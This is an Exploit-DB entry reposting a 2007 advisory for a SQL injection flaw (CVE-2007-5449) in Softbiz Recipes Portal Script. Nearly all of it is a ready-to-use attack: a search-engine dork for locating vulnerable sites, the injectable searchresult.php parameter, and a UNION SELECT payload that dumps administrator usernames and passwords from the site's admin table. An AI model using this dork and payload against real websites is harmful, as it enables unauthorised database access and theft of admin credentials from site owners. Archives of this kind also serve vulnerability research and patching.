Softbiz Recipes Portal Script Remote SQL Injection Vulnerability

2007-10-13T00:00:00
ID EDB-ID:4527
Type exploitdb
Reporter Khashayar Fereidani
Modified 2007-10-13T00:00:00

Description

Softbiz Recipes Portal Script Remote SQL Injection Vulnerability. CVE-2007-5449. Webapps exploit for php platform

                                        
                                            ################################IN THE NAME OF GOD###################################
####                    Recipes Portal Script SQL INJECTION                      ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#Script Download : http://www.softbizscripts.com/                                   #
#DORK: "Powered by SoftbizScripts" inurl:"searchresult.php?sbcat_id="               #
#                                                                                   #
#                                                                                   #
#                                                                                   #
#Injection Adress : http://Site.com/searchresult.php?sbcat_id=[sql code]            #
#SQL COD : 999999%20union/**/select/**/0,sbadmin_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,sbadmin_pwd,17,18,19,20,21,22/**/from/**/sbrecipe_admin/*
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################

# milw0rm.com [2007-10-13]